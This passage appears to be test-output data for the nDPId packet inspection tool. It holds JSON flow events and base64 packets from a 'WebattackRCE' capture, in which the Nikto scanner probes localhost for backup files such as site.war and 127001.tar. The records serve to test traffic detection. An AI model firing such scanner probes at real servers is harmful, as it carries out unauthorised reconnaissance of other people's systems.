{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1576420277339,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277339,"pkt":"AAAAAAAAAAAAAAAACABFAAC9fmNAAEAGvdV\/AAABfwAAAcTUH5Bm6EbY23UeBoAYAED+sQAAAQEICp1m\/YOdZv2DR0VUIC8wLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":1,"flow_last_seen":1576420277340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277340,"pkt":"AAAAAAAAAAAAAAAACABFAADF759AAEAGTJF\/AAABfwAAAcTWH5AedNcrGvcoYYAYAED+uQAAAQEICp1m\/YSdZv2ER0VUIC8xMjdfMF8wXzEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":1,"flow_last_seen":1576420277342,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277342,"pkt":"AAAAAAAAAAAAAAAACABFAADFUDJAAEAG6\/5\/AAABfwAAAcTYH5DWhmiIUA3tU4AYAED+uQAAAQEICp1m\/YadZv2GR0VUIC8xMjdfMF8wXzEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":1,"flow_last_seen":1576420277343,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277343,"pkt":"AAAAAAAAAAAAAAAACABFAADA2wlAAEAGYSx\/AAABfwAAAcTaH5BjP+Ox5vZroYAYAED+tAAAAQEICp1m\/YedZv2HR0VUIC9zaXRlLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":1,"flow_last_seen":1576420277344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277344,"pkt":"AAAAAAAAAAAAAAAACABFAADAn6BAAEAGnJV\/AAABfwAAAcTcH5DwnKcnILktrYAYAED+tAAAAQEICp1m\/YidZv2IR0VUIC9zaXRlLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":1,"flow_last_seen":1576420277345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277345,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HTtAAEAGHvx\/AAABfwAAAcTeH5D3FiWCONN3YoAYAED+swAAAQEICp1m\/YmdZv2JR0VUIC8xMjcud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":1,"flow_last_seen":1576420277347,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277347,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/ZRVAAEAG1yF\/AAABfwAAAcTgH5Bb9F2rFITQsoAYAED+swAAAQEICp1m\/YudZv2LR0VUIC8xMjcud2FyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":1,"flow_last_seen":1576420277349,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277349,"pkt":"AAAAAAAAAAAAAAAACABFAADCefJAAEAGwkF\/AAABfwAAAcTiH5DNN0FKl3iI04AYAED+tgAAAQEICp1m\/Y2dZv2MR0VUIC8xMjcwMDEudGFyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":1,"flow_last_seen":1576420277350,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277350,"pkt":"AAAAAAAAAAAAAAAACABFAADCI4FAAEAGGLN\/AAABfwAAAcTkH5CTwxvH1PwL8oAYAED+tgAAAQEICp1m\/Y6dZv2OR0VUIC8xMjcwMDEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":1,"flow_last_seen":1576420277352,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277352,"pkt":"AAAAAAAAAAAAAAAACABFAADBrJpAAEAGj5p\/AAABfwAAAcTmH5B1JpQjd4rcfoAYAED+tQAAAQEICp1m\/ZCdZv2QR0VUIC9mYXZpY29uLmljbyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":1,"flow_last_seen":1576420277354,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277354,"pkt":"AAAAAAAAAAAAAAAACABFAADKIPlAAEAGGzN\/AAABfwAAAcToH5DzJBhOnEiKeoAYAED+vgAAAQEICp1m\/ZKdZv2SR0VUIC9mYXZpY29ucy9mYXZpY29uLmljbyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6ZmF2aWNvbikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 